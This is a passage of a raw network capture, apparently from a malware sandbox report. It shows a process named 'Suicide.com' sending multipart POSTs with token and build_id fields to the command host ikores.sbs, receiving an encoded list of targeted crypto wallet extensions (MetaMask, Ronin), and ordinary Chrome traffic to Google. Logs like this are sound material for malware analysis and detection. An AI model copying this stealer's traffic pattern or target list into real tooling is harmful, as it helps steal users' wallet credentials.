2024-12-05 20:51:45 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49916	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:47 UTC	318	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----1DTJW47QQ9RQQIMOZU3E User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 5665 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:47 UTC	5665	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 31 44 54 4a 57 34 37 51 51 39 52 51 51 49 4d 4f 5a 55 33 45 0d 0a 43 6f 6e 74 Data Ascii: ------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------1DTJW47QQ9RQQIMOZU3EContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------1DTJW47QQ9RQQIMOZU3ECont
2024-12-05 20:51:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:48 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49919	5.75.212.196	443	4708	C:\Users\user\AppData\Local\Temp\402438\Suicide.com

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:48 UTC	317	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----C2VKNG4E3W47YMGLXB1N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6 Host: ikores.sbs Content-Length: 489 Connection: Keep-Alive Cache-Control: no-cache
2024-12-05 20:51:48 UTC	489	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 39 35 37 62 32 31 39 37 63 63 66 32 37 64 37 63 38 66 34 38 61 37 32 63 37 39 61 66 63 64 38 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 37 65 39 30 34 38 64 35 33 62 66 36 66 34 63 34 35 37 32 39 32 34 35 65 34 66 37 35 62 30 64 0d 0a 2d 2d 2d 2d 2d 2d 43 32 56 4b 4e 47 34 45 33 57 34 37 59 4d 47 4c 58 42 31 4e 0d 0a 43 6f 6e 74 Data Ascii: ------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="token"a957b2197ccf27d7c8f48a72c79afcd8------C2VKNG4E3W47YMGLXB1NContent-Disposition: form-data; name="build_id"57e9048d53bf6f4c45729245e4f75b0d------C2VKNG4E3W47YMGLXB1NCont
2024-12-05 20:51:49 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 05 Dec 2024 20:51:49 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-05 20:51:49 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49930	142.250.181.100	443	3056	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:51 UTC	623	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-05 20:51:52 UTC	1266	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 20:51:51 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-MdJa34LOeqL76AyAS8W_8Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-05 20:51:52 UTC	124	IN	Data Raw: 62 38 30 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 72 69 70 70 6c 65 20 78 72 70 22 2c 22 61 70 70 6c 65 20 6d 75 73 69 63 20 72 65 70 6c 61 79 20 32 30 32 34 20 61 72 74 69 73 74 73 22 2c 22 61 6e 20 61 73 74 65 72 6f 69 64 20 68 69 74 74 69 6e 67 20 65 61 72 74 68 22 2c 22 63 6f 6c 6c 65 67 65 20 62 61 73 6b 65 74 62 61 6c 6c 20 70 69 63 6b 73 22 2c 22 63 6f 6e 63 65 72 Data Ascii: b80)]}'["",["ripple xrp","apple music replay 2024 artists","an asteroid hitting earth","college basketball picks","concer
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 6e 65 64 61 70 65 22 2c 22 63 68 69 63 61 67 6f 20 66 69 72 65 22 2c 22 69 6e 66 69 6e 69 74 79 20 6e 69 6b 6b 69 20 63 6f 64 65 73 22 2c 22 75 73 63 20 74 72 6f 6a 61 6e 73 20 66 6f 6f 74 62 61 6c 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30 33 64 22 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 64 65 74 61 69 6c 22 3a 5b 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 Data Ascii: nedape","chicago fire","infinity nikki codes","usc trojans football"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 4a 43 53 6d 4a 58 52 47 68 4b 4d 30 67 72 59 57 49 31 51 54 59 35 5a 7a 4e 53 54 6d 70 72 57 48 6b 30 4d 30 4a 4a 5a 45 31 6a 54 55 70 51 63 58 56 43 53 48 5a 44 61 56 4e 4f 53 56 42 5a 4f 44 55 33 4d 55 78 73 62 57 4e 30 52 54 56 77 62 47 39 51 64 6b 70 6a 56 6d 64 6d 64 58 5a 30 51 53 39 74 62 30 67 34 53 7a 45 72 65 6e 4e 53 4e 46 70 6a 5a 6c 45 79 64 32 6f 35 63 6c 56 59 51 31 64 30 64 33 4e 61 54 32 63 31 4e 79 73 7a 52 32 5a 75 54 6b 49 7a 55 31 5a 49 52 6e 6c 69 59 56 4e 6f 53 57 4e 4c 55 7a 52 6b 61 6d 74 6e 5a 55 31 6b 4c 33 6c 78 55 45 78 6b 5a 58 6b 76 52 6d 70 43 4d 55 31 34 4e 6d 39 30 65 6a 68 53 65 48 46 4c 56 30 4e 51 56 6c 52 73 53 32 31 5a 4b 32 39 78 4f 44 51 35 64 33 46 71 63 47 6b 77 55 46 64 35 4e 6c 42 50 53 31 56 77 56 45 78 72 56 Data Ascii: JCSmJXRGhKM0grYWI1QTY5ZzNSTmprWHk0M0JJZE1jTUpQcXVCSHZDaVNOSVBZODU3MUxsbWN0RTVwbG9QdkpjVmdmdXZ0QS9tb0g4SzErenNSNFpjZlEyd2o5clVYQ1d0d3NaT2c1NyszR2ZuTkIzU1ZIRnliYVNoSWNLUzRkamtnZU1kL3lxUExkZXkvRmpCMU14Nm90ejhSeHFLV0NQVlRsS21ZK29xODQ5d3FqcGkwUFd5NlBPS1VwVExrV
2024-12-05 20:51:52 UTC	47	IN	Data Raw: 56 32 5a 50 5a 44 68 6d 61 44 49 33 4d 58 52 49 4d 6d 4e 34 52 45 63 32 55 48 52 33 56 57 52 54 62 6d 31 32 56 30 70 33 51 69 39 48 55 0d 0a Data Ascii: V2ZPZDhmaDI3MXRIMmN4REc2UHR3VWRTbm12V0p3Qi9HU
2024-12-05 20:51:52 UTC	89	IN	Data Raw: 35 33 0d 0a 32 39 6a 59 6d 4e 49 52 6c 70 55 4d 44 6c 69 4d 46 51 33 62 58 42 6f 54 55 38 79 63 6c 4e 58 51 32 74 51 53 57 52 6a 56 55 64 6b 55 6b 46 4c 4f 45 56 75 5a 45 74 6b 55 6e 64 52 55 45 6c 50 4d 55 5a 6d 4e 6e 4a 59 56 30 52 4d 55 7a 4e 68 63 6d 5a 45 0d 0a Data Ascii: 5329jYmNIRlpUMDliMFQ3bXBoTU8yclNXQ2tQSWRjVUdkUkFLOEVuZEtkUndRUElPMUZmNnJYV0RMUzNhcmZE
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 31 35 39 63 0d 0a 54 6d 35 61 55 47 39 34 4d 6c 4e 73 55 56 5a 76 55 30 46 43 4e 32 64 6a 52 44 5a 5a 63 6c 68 34 56 33 42 35 53 6e 4d 79 5a 58 68 79 4e 69 39 6f 5a 6e 4e 32 56 55 4e 4b 54 56 6c 47 63 44 4a 6b 52 30 74 32 56 56 46 4e 52 58 56 4f 4e 31 70 36 4e 54 42 73 53 44 68 6f 55 32 30 33 59 31 56 55 4d 6c 64 48 59 6e 4d 79 4d 30 6c 54 4e 57 78 4c 5a 7a 52 75 61 46 6b 33 5a 7a 67 34 5a 55 4e 4c 4e 31 59 34 4e 6a 42 6e 5a 46 5a 58 4b 7a 4a 79 57 56 45 32 65 45 39 5a 5a 6c 42 78 63 30 39 4b 55 43 73 79 51 30 39 35 64 55 52 31 51 69 39 5a 56 58 42 59 55 6c 4a 53 52 31 56 79 63 33 68 4a 51 32 64 6c 4b 30 30 34 4d 57 38 34 61 57 34 76 4c 31 6f 36 44 45 4e 76 62 6d 4e 6c 63 6d 35 6c 5a 45 46 77 5a 55 6f 48 49 7a 51 79 4e 44 49 30 4d 6c 49 37 5a 33 4e 66 63 Data Ascii: 159cTm5aUG94MlNsUVZvU0FCN2djRDZZclh4V3B5SnMyZXhyNi9oZnN2VUNKTVlGcDJkR0t2VVFNRXVON1p6NTBsSDhoU203Y1VUMldHYnMyM0lTNWxLZzRuaFk3Zzg4ZUNLN1Y4NjBnZFZXKzJyWVE2eE9ZZlBxc09KUCsyQ095dUR1Qi9ZVXBYUlJSR1Vyc3hJQ2dlK004MW84aW4vL1o6DENvbmNlcm5lZEFwZUoHIzQyNDI0MlI7Z3Nfc
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 4e 7a 4e 33 4d 48 6f 72 59 55 78 4c 59 33 46 69 56 6c 56 53 55 6c 4e 50 64 47 64 49 55 47 56 69 59 30 63 31 55 46 46 6d 59 6d 74 6a 4e 31 67 35 5a 46 70 32 62 57 73 79 59 54 42 46 53 6d 74 6e 5a 45 5a 48 62 32 63 35 53 6e 56 50 4b 31 52 30 65 6a 52 42 57 54 46 6a 55 46 6f 33 57 55 74 32 51 7a 68 43 59 79 39 36 4e 46 5a 46 54 57 70 51 54 56 4e 58 54 32 78 5a 4b 30 78 44 4c 30 39 34 4f 48 56 51 55 48 6c 34 51 31 59 35 56 56 70 44 5a 46 52 69 5a 45 31 4e 54 58 68 6b 64 45 70 53 53 58 64 58 52 7a 64 46 5a 54 6c 7a 54 47 39 6a 64 57 56 61 62 45 31 34 64 48 4a 51 5a 46 68 6e 64 47 6b 33 61 6a 51 31 61 45 55 78 64 58 46 61 4f 55 52 61 56 33 56 57 56 6b 64 56 65 6d 31 75 4e 33 68 4c 5a 30 39 58 4e 33 42 58 4e 55 46 31 56 44 42 30 65 6a 6c 4e 55 55 56 47 57 43 39 Data Ascii: NzN3MHorYUxLY3FiVlVSUlNPdGdIUGViY0c1UFFmYmtjN1g5ZFp2bWsyYTBFSmtnZEZHb2c5SnVPK1R0ejRBWTFjUFo3WUt2QzhCYy96NFZFTWpQTVNXT2xZK0xDL094OHVQUHl4Q1Y5VVpDZFRiZE1NTXhkdEpSSXdXRzdFZTlzTG9jdWVabE14dHJQZFhndGk3ajQ1aEUxdXFaOURaV3VWVkdVem1uN3hLZ09XN3BXNUF1VDB0ejlNUUVGWC9
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 46 6e 4f 58 46 33 51 6e 56 69 51 57 64 49 5a 53 39 6c 4d 6e 56 55 4e 44 52 34 61 48 42 77 53 6a 56 4a 4e 55 46 57 51 32 31 4b 51 32 6c 4b 4e 47 78 53 59 32 34 35 5a 6d 5a 51 62 46 68 77 56 31 6f 32 57 56 52 68 4e 7a 49 78 4f 56 4a 6a 5a 46 42 51 4d 54 5a 74 4e 58 68 77 55 7a 46 70 4d 47 64 44 53 30 46 36 57 48 56 53 5a 33 5a 47 62 31 56 77 4d 33 4d 31 65 57 35 4d 4e 6a 42 57 55 31 4a 36 56 6c 56 70 65 6d 5a 4b 51 32 6c 46 53 48 4e 6e 55 6d 4d 79 61 7a 56 48 4d 31 4a 6b 65 44 52 70 4b 7a 56 73 5a 6b 68 55 57 6c 6b 7a 4e 46 46 53 61 44 5a 74 55 6b 4e 35 65 6b 63 33 63 30 70 44 55 30 4e 54 5a 56 4e 69 53 32 5a 32 61 6e 42 74 64 57 46 33 4e 57 52 57 53 33 52 50 65 47 74 73 55 6d 52 4e 56 55 31 5a 63 31 49 32 4d 6a 51 31 4f 56 52 6e 52 6a 68 74 65 6d 31 32 56 Data Ascii: FnOXF3QnViQWdIZS9lMnVUNDR4aHBwSjVJNUFWQ21KQ2lKNGxSY245ZmZQbFhwV1o2WVRhNzIxOVJjZFBQMTZtNXhwUzFpMGdDS0F6WHVSZ3ZGb1VwM3M1eW5MNjBWU1J6VlVpemZKQ2lFSHNnUmMyazVHM1JkeDRpKzVsZkhUWlkzNFFSaDZtUkN5ekc3c0pDU0NTZVNiS2Z2anBtdWF3NWRWS3RPeGtsUmRNVU1Zc1I2MjQ1OVRnRjhtem12V
2024-12-05 20:51:52 UTC	1370	IN	Data Raw: 6c 4e 6a 5a 58 6f 72 4f 48 63 76 61 48 4e 42 4d 45 31 70 4d 6b 4e 4b 62 33 41 76 54 31 70 4b 57 6a 64 4c 5a 46 46 70 56 6d 56 48 63 6e 59 77 55 46 4e 59 57 56 68 71 61 6c 70 6b 65 45 45 77 5a 6c 64 30 51 6a 49 33 59 31 55 76 53 55 38 79 56 48 64 54 59 31 42 6f 61 55 4a 4e 53 33 42 50 55 6e 4a 57 4e 32 64 4c 63 33 59 30 5a 46 46 68 55 55 35 74 64 47 78 4f 4d 45 4e 31 64 30 78 53 62 30 52 59 63 44 67 77 65 53 73 79 61 47 4e 42 57 47 56 75 59 6a 64 55 4f 47 64 57 63 57 59 35 53 45 35 52 51 6d 68 33 61 6d 64 51 64 54 64 58 4e 47 64 70 5a 7a 56 68 51 32 55 79 4f 58 64 4f 4f 45 68 43 56 55 52 34 65 6c 6c 44 5a 6a 4a 6c 61 44 41 72 64 6b 70 47 64 47 67 7a 59 30 34 76 55 55 56 43 4e 6a 52 6a 63 45 74 54 53 30 56 7a 55 30 6f 76 4d 7a 56 72 62 47 74 33 63 58 64 53 Data Ascii: lNjZXorOHcvaHNBME1pMkNKb3AvT1pKWjdLZFFpVmVHcnYwUFNYWVhqalpkeEEwZld0QjI3Y1UvSU8yVHdTY1BoaUJNS3BPUnJWN2dLc3Y0ZFFhUU5tdGxOMEN1d0xSb0RYcDgweSsyaGNBWGVuYjdUOGdWcWY5SE5RQmh3amdQdTdXNGdpZzVhQ2UyOXdOOEhCVUR4ellDZjJlaDArdkpGdGgzY04vUUVCNjRjcEtTS0VzU0ovMzVrbGt3cXdS
2024-12-05 20:51:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49933	142.250.181.100	443	3056	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 20:51:51 UTC	526	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCJDKzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-12-05 20:51:52 UTC	1018	IN	HTTP/1.1 200 OK Version: 702228742 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Thu, 05 Dec 2024 20:51:52 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-05 20:51:52 UTC	372	IN	Data Raw: 32 66 31 66 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2f1f)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20 Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
2024-12-05 20:51:52 UTC	1390	IN	Data Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 